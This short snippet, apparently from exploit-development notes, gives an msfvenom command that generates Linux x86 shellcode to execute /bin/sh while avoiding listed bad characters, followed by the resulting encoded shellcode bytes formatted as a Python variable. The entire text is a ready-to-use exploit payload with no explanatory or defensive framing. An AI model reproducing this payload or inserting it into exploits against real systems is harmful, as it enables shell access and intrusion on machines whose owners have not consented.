

# Command to generate shellcode

msfvenom -p linux/x86/exec CMD="/bin/sh" -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode

# Output of the above command

shellcode =  b""
shellcode += b"\x29\xc9\x83\xe9\xf5\xe8\xff\xff\xff\xff\xc0"
shellcode += b"\x5e\x81\x76\x0e\xd9\xf5\x87\xf4\x83\xee\xfc"
shellcode += b"\xe2\xf4\xb3\xfe\xdf\x6d\x8b\x93\xef\xd9\xba"
shellcode += b"\x7c\x60\x9c\xf6\x86\xef\xf4\xb1\xda\xe5\x9d"
shellcode += b"\xb7\x7c\x64\xa6\x31\xfd\x87\xf4\xd9\xda\xe5"
shellcode += b"\x9d\xb7\xda\xf4\x9c\xd9\xa2\xd4\x7d\x38\x38"
shellcode += b"\x07\xf4"
